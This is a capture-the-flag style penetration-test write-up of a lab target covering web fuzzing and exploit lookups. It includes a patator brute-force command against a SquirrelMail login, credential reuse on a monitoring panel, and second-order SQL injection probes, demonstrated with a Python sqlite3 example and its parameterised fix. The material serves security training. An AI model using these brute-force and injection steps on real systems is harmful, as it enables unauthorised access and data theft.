Web


Nmap discovered a web server on port 80 of 192.168.207.124. The banner reports Apache httpd 2.4.6 (CentOS) with PHP/7.2.33. The OPTIONS response below also shows TRACE enabled; that is worth recording as a finding, but on its own it gives no foothold here.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ curl -I -X OPTIONS http://$IP/                                                                                                
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2025 19:13:05 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.33
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Content-Type: text/html; charset=UTF-8
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ curl -I http://$IP/        
HTTP/1.1 200 OK
Date: Thu, 03 Jul 2025 19:13:07 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.33
Last-Modified: Sun, 16 Aug 2020 14:23:16 GMT
ETag: "56f7-5acff65168875"
Accept-Ranges: bytes
Content-Length: 22263
Content-Type: text/html; charset=UTF-8

Webroot

It’s a static site.

Domain


A domain is disclosed; insanityhosting.vm

The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution.

Fuzzing


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.207.124/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htaccess.html          [Status: 403, Size: 216, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.txt           [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 21ms]
.htaccess               [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.txt           [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htaccess.php           [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htpasswd.php           [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 19ms]
.htpasswd.html          [Status: 403, Size: 216, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd               [Status: 403, Size: 211, Words: 15, Lines: 9, Duration: 21ms]
cgi-bin/                [Status: 403, Size: 210, Words: 15, Lines: 9, Duration: 19ms]
cgi-bin/.html           [Status: 403, Size: 215, Words: 15, Lines: 9, Duration: 21ms]
css                     [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 24ms]
data                    [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 20ms]
fonts                   [Status: 301, Size: 237, Words: 14, Lines: 8, Duration: 20ms]
img                     [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 19ms]
index.php               [Status: 200, Size: 31, Words: 4, Lines: 1, Duration: 25ms]
index.html              [Status: 200, Size: 22263, Words: 8919, Lines: 480, Duration: 21ms]
js                      [Status: 301, Size: 234, Words: 14, Lines: 8, Duration: 22ms]
licence                 [Status: 200, Size: 57, Words: 10, Lines: 2, Duration: 22ms]
monitoring              [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 22ms]
news                    [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 21ms]
phpmyadmin              [Status: 301, Size: 242, Words: 14, Lines: 8, Duration: 22ms]
phpinfo.php             [Status: 200, Size: 85342, Words: 4351, Lines: 1024, Duration: 29ms]
webmail                 [Status: 301, Size: 239, Words: 14, Lines: 8, Duration: 19ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1960 req/sec :: Duration: [0:00:45] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://$IP/FUZZ/ -ic
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.207.124/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
                        [Status: 200, Size: 22263, Words: 8919, Lines: 480, Duration: 4421ms]
icons                   [Status: 200, Size: 74409, Words: 7427, Lines: 1007, Duration: 42ms]
data                    [Status: 200, Size: 1091, Words: 117, Lines: 17, Duration: 21ms]
css                     [Status: 200, Size: 2397, Words: 202, Lines: 23, Duration: 24ms]
news                    [Status: 200, Size: 5111, Words: 362, Lines: 136, Duration: 2409ms]
js                      [Status: 200, Size: 4225, Words: 338, Lines: 31, Duration: 20ms]
cgi-bin                 [Status: 403, Size: 210, Words: 15, Lines: 9, Duration: 3415ms]
webmail                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 24ms]
img                     [Status: 200, Size: 1091, Words: 107, Lines: 17, Duration: 4423ms]
fonts                   [Status: 200, Size: 2915, Words: 205, Lines: 25, Duration: 19ms]
monitoring              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
phpmyadmin              [Status: 200, Size: 15373, Words: 2711, Lines: 322, Duration: 243ms]
:: Progress: [207630/207630] :: Job [1/1] :: 2061 req/sec :: Duration: [0:01:55] :: Errors: 0 ::

/index.php


Missing version directory?

/phpinfo.php


PHP Version 7.2.33

insanityhosting.vm is the server name. Web root directory at /var/www/html

MySQL in the backend.

The phar stream wrapper is supported.

/data/ Endpoint


Directory listing is enabled and shows 2 files; EMPTY and VERSION.

VERSION contains 1.14.0

/news/ Endpoint


A Bludit instance at the /news/ endpoint.

Bludit is a web application to build your own website or blog in seconds; it is completely free and open source, with Markdown support.

Bludit Username Disclosure


Potential username disclosure; Otis

Bludit Version Information


The version information is disclosed at the bl-plugins/about/metadata.json endpoint; 3.13.1

Bludit Vulnerabilities

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ searchsploit Bludit 3.13.1
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)                         | php/webapps/50529.txt
Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)       | php/webapps/51541.py
------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

searchsploit returns two entries for this version: a cross-site scripting issue in the username field of 3.13.1, and an authenticated arbitrary file download in the Backup plugin that only affects versions below 3.13.1. Neither gives an unauthenticated foothold, so Bludit is parked until credentials turn up.

Bludit Admin Panel


Admin panel is available at the /admin/ endpoint. No credential is known at this time.

/webmail/ Endpoint


A login page for a SquirrelMail instance at the /webmail/ endpoint. No credential is known at this time.

SquirrelMail is a project that aims to provide both a web-based email client and a proxy server for the IMAP protocol.

SquirrelMail configtest


N/A

SquirrelMail Brute-Force Attack


A potential user has been identified above; Otis

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ patator http_fuzz proxy=localhost:8080 url=http://insanityhosting.vm/webmail/src/redirect.php method=POST body="login_username=Otis&secretkey=FILE0" 0=/usr/share/wordlists/john.lst follow=0 accept_cookie=1 -x ignore:fgrep='Unknown user or password incorrect.' 
23:05:03 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.13.3 at 2025-07-03 23:05 CEST
23:05:03 patator    INFO -                                                                              
23:05:03 patator    INFO - code size:clen       time | candidate                          |   num | mesg
23:05:03 patator    INFO - -----------------------------------------------------------------------------
23:05:35 patator    INFO - 302  2046:0        15.150 | 123456                             |    14 | HTTP/1.1 302 Found
23:10:40 patator    INFO - Hits/Done/Skip/Fail/Size: 1/3559/0/0/3559, Avg: 14 r/s, Time: 0h 5m 37s

Found a password for the Otis user; 123456

SquirrelMail Authentication

Successfully authenticated as the Otis user to the target SquirrelMail instance.

SquirrelMail Version Information


Version information is disclosed; 1.4.22

SquirrelMail Vulnerabilities

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ searchsploit SquirrelMail 1.4.22
---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
SquirrelMail < 1.4.22 - Remote Code Execution | linux/remote/41910.sh
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

searchsploit lists an authenticated RCE for SquirrelMail 1.4.22; CVE-2017-7692 (exploit 41910.sh), a parameter injection into the sendmail command line. The brute-forced Otis credentials satisfy the authentication requirement, but the exploit did not work against this target; it only applies when SquirrelMail is configured to deliver through the local sendmail binary rather than SMTP.

/monitoring/ Endpoint


Redirected to a custom PHP application at the /monitoring/ endpoint. No credential is known at this time.

Authentication


Attempting to authenticate using the same credential for the target SquirrelMail instance; Otis:123456

Successfully authenticated; the application presents itself as MONITORING CONTROL.

Adding A New Monitoring Instance

Adding a new instance for monitoring, pointing it at the Kali host.

A new instance has been added, but the Status field is empty and nothing shows up on Responder yet.

Shortly afterwards the target system pinged Kali, and the Status field now shows UP. The application checks its instances with ICMP on a schedule.

Server Is Down

The application states that if a server is down, an e-mail containing a report will be sent.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ sudo iptables -A INPUT -p icmp -j DROP

I will make Kali drop all incoming ICMP traffic so the next check fails, and observe the inbox on the target SquirrelMail instance. (The rule is removed afterwards with the matching -D command.)

A mail came through from monitor@localhost.localdomain

The mail indeed contains a report that appears to be fetched from a database. Name field is reflected; test

SQLi

Injecting a SQLi testing payload into the Name field.

It failed because the value is wrapped in double quotes (") in the back-end query, so a single-quote payload stays inside the string literal.

Testing it again with a double-quote payload (").

SQLi confirmed: the report listed every single entry in the table. This is a second-order injection; the Name value is stored on submission and only becomes dangerous later, when the cron job that builds the report re-reads it and interpolates it into a query.
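The stored-then-reused flow described above, as an added example that is not the monitoring application's own code. It uses sqlite3 in place of the target's MySQL, and the table name, column names, sample rows and the two probe strings are all constructed; the only thing taken from the page is the shape of the report query, a stored Name interpolated inside double quotes. SQLite accepts "..." as a string literal when no column of that name exists, which is why the same payload behaves as it does in MySQL without ANSI_QUOTES.

```python
import sqlite3

# Constructed schema; the target's real table and column names are unknown.
SCHEMA = """
CREATE TABLE hosts (
    id      INTEGER PRIMARY KEY,
    owner   TEXT NOT NULL,
    name    TEXT NOT NULL,
    address TEXT NOT NULL,
    status  TEXT NOT NULL DEFAULT ''
)
"""

# Constructed sample rows standing in for other users' monitored hosts.
SEED = [
    ("admin", "mail",   "127.0.0.1",      "UP"),
    ("admin", "backup", "10.0.0.5",       "UP"),
    ("otis",  "test",   "192.168.45.200", "UP"),
]

SINGLE_QUOTE_PROBE = "test' OR '1'='1"   # the first attempt: stays inside "..."
DOUBLE_QUOTE_PROBE = 'test" OR "1"="1'   # the second attempt: closes the literal


def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany(
        "INSERT INTO hosts (owner, name, address, status) VALUES (?, ?, ?, ?)", SEED
    )
    return db


def add_instance(db, owner, name, address):
    """The 'add instance' form. The name is bound as a parameter, so this
    statement is not injectable itself; the hostile value is merely stored."""
    cur = db.execute(
        "INSERT INTO hosts (owner, name, address) VALUES (?, ?, ?)", (owner, name, address)
    )
    return cur.lastrowid


def mark_down(db, host_id):
    """Stand-in for the scheduled ping check flipping a host that stopped
    answering ICMP (what blocking ICMP on Kali triggers on the target)."""
    db.execute("UPDATE hosts SET status = 'DOWN' WHERE id = ?", (host_id,))


def report_rows_vulnerable(db, name):
    """Report query as the target appears to build it: the stored name is
    pasted into the statement inside double quotes."""
    sql = f'SELECT owner, name, address, status FROM hosts WHERE name = "{name}"'
    return db.execute(sql).fetchall()


def report_rows_fixed(db, name):
    """Same query with the value bound as a parameter: quotes are just data."""
    return db.execute(
        "SELECT owner, name, address, status FROM hosts WHERE name = ?", (name,)
    ).fetchall()


def down_host_report(db, query=report_rows_vulnerable):
    """What the cron job mails out: one section per DOWN host, each filled by
    re-querying the database with that host's stored name."""
    down = db.execute("SELECT name FROM hosts WHERE status = 'DOWN'").fetchall()
    return [(name, query(db, name)) for (name,) in down]


def demo():
    db = setup_db()
    host_id = add_instance(db, "otis", DOUBLE_QUOTE_PROBE, "192.168.45.200")
    mark_down(db, host_id)
    return {
        "benign":       len(report_rows_vulnerable(db, "test")),            # 1 row
        "single_quote": len(report_rows_vulnerable(db, SINGLE_QUOTE_PROBE)), # 0 rows, no error
        "double_quote": len(report_rows_vulnerable(db, DOUBLE_QUOTE_PROBE)), # every row
        "fixed":        len(report_rows_fixed(db, DOUBLE_QUOTE_PROBE)),      # only the new host
        "mail":         down_host_report(db),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The single-quote probe does not error out, it simply matches nothing, which is exactly the "failed" result the page reports and why it is worth retrying with the other quote style before concluding a field is safe. The fix is not escaping the stored value at report time but binding it, as report_rows_fixed does.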

Fuzzing /monitoring/ Endpoint


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://insanityhosting.vm/monitoring/FUZZ -ic -e .html,.txt,.php
________________________________________________
 :: Method           : GET
 :: URL              : http://insanityhosting.vm/monitoring/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd.html          [Status: 403, Size: 227, Words: 15, Lines: 9, Duration: 19ms]
.htaccess               [Status: 403, Size: 222, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.txt           [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.php           [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.php           [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd               [Status: 403, Size: 222, Words: 15, Lines: 9, Duration: 21ms]
.htpasswd.txt           [Status: 403, Size: 226, Words: 15, Lines: 9, Duration: 21ms]
.htaccess.html          [Status: 403, Size: 227, Words: 15, Lines: 9, Duration: 21ms]
assets                  [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 20ms]
class                   [Status: 301, Size: 251, Words: 14, Lines: 8, Duration: 19ms]
cron.php                [Status: 403, Size: 221, Words: 15, Lines: 9, Duration: 21ms]
css                     [Status: 301, Size: 249, Words: 14, Lines: 8, Duration: 19ms]
fonts                   [Status: 301, Size: 251, Words: 14, Lines: 8, Duration: 20ms]
images                  [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 20ms]
index.php               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 24ms]
js                      [Status: 301, Size: 248, Words: 14, Lines: 8, Duration: 19ms]
login.php               [Status: 200, Size: 4848, Words: 110, Lines: 96, Duration: 21ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 25ms]
settings                [Status: 301, Size: 254, Words: 14, Lines: 8, Duration: 21ms]
smarty                  [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 19ms]
templates               [Status: 301, Size: 255, Words: 14, Lines: 8, Duration: 22ms]
templates_c             [Status: 301, Size: 257, Words: 14, Lines: 8, Duration: 24ms]
vendor                  [Status: 301, Size: 252, Words: 14, Lines: 8, Duration: 21ms]
:: Progress: [81912/81912] :: Job [1/1] :: 1818 req/sec :: Duration: [0:00:47] :: Errors: 0 ::
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://insanityhosting.vm/monitoring/FUZZ/ -ic -fw 1
________________________________________________
 :: Method           : GET
 :: URL              : http://insanityhosting.vm/monitoring/FUZZ/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 1
________________________________________________
images                  [Status: 200, Size: 1129, Words: 105, Lines: 17, Duration: 64ms]
templates               [Status: 200, Size: 1573, Words: 150, Lines: 19, Duration: 23ms]
assets                  [Status: 200, Size: 1953, Words: 236, Lines: 21, Duration: 23ms]
css                     [Status: 200, Size: 1120, Words: 103, Lines: 17, Duration: 19ms]
js                      [Status: 200, Size: 911, Words: 81, Lines: 16, Duration: 21ms]
vendor                  [Status: 200, Size: 2642, Words: 261, Lines: 24, Duration: 23ms]
settings                [Status: 200, Size: 923, Words: 76, Lines: 16, Duration: 22ms]
class                   [Status: 200, Size: 1337, Words: 121, Lines: 18, Duration: 19ms]
fonts                   [Status: 200, Size: 1583, Words: 132, Lines: 19, Duration: 31ms]
smarty                  [Status: 200, Size: 2211, Words: 200, Lines: 22, Duration: 24ms]
templates_c             [Status: 200, Size: 1785, Words: 89, Lines: 19, Duration: 21ms]
:: Progress: [207630/207630] :: Job [1/1] :: 1652 req/sec :: Duration: [0:01:52] :: Errors: 0 ::

Nothing directly usable. Directory listing is enabled on the sub-directories (settings, class, smarty, templates_c, vendor all return a 200 listing), and cron.php (403) is presumably the scheduled job that runs the ping checks and sends the report mail, but it is not reachable from outside.

/phpmyadmin/ Endpoint


A phpMyAdmin instance at the /phpmyadmin/ endpoint. No credential is known at this time.

Virtual Host / Sub-domain Discovery


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/insanityhosting]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$IP/ -H 'Host: FUZZ.insanityhosting.vm' -ic -mc all -fs 22263
________________________________________________
 :: Method           : GET
 :: URL              : http://192.168.207.124/
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.insanityhosting.vm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response size: 22263
________________________________________________
gc._msdcs               [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
_domainkey              [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
mailing._domainkey.sunnynews [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
mailing._domainkey.info [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
hallam_dev              [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 21ms]
hallam_ad               [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
wm_j_b__ruffin          [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 20ms]
2609_n_www              [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
0907_n_hn.m             [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 24ms]
0507_n_hn               [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
faitspare_mbp.cit       [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 25ms]
sb_0601388345bc6cd8     [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 23ms]
sb_0601388345bc450b     [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
api_portal_dev          [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
api_web_dev             [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 25ms]
api_webi_dev            [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
sklep_test              [Status: 400, Size: 347, Words: 36, Lines: 11, Duration: 22ms]
:: Progress: [114438/114438] :: Job [1/1] :: 900 req/sec :: Duration: [0:01:53] :: Errors: 0 ::

No virtual hosts found. The only hits are 400 responses of identical size, returned because those wordlist entries contain characters (underscores, leading digits and dots) that Apache rejects in the Host header; they are noise, not vhosts. Adding -fc 400 alongside -fs 22263 leaves no results.